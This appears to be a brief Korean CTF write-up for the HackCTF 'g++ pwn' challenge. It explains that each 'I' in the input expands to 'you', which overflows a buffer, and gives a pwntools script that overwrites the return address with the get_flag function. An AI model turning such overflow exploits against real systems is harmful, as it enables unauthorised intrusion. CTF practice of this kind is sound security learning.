HackCTF - g++ pwn

 

 

I 랑 you 가 있길래 터미널에 둘 다 썼더니

 

I 가 you로 바뀌는 것을 볼 수 있었다

 

이를 이용해 익스를 하면 된다

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3011)
e = ELF('./gpwn', checksec=False)

payload = 'I'*20
payload += 'AAAA'
payload += p32(e.sym['get_flag'])

r.sendline(payload)

r.interactive()